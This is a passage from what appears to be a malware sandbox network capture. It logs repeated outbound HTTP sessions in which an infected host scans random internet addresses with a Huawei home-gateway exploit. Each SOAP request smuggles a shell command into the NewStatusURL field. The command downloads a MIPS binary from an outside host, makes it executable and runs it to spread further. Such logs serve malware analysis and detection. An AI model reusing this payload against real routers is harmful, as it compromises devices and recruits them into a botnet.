6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          449192.168.2.1556382197.185.125.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575797081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          450192.168.2.1533662197.187.71.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575822115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          451192.168.2.154563478.75.84.11237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575845003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          452192.168.2.1534422197.39.252.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575866938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          453192.168.2.154904841.69.44.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575891018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          454192.168.2.1549300157.76.219.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575915098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          455192.168.2.1540032197.145.46.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575930119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          456192.168.2.1538794157.83.53.16937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575975895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          457192.168.2.155236061.133.125.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575999975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          458192.168.2.1540568157.75.11.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.576105118 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          459192.168.2.1550568197.23.115.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.578263044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
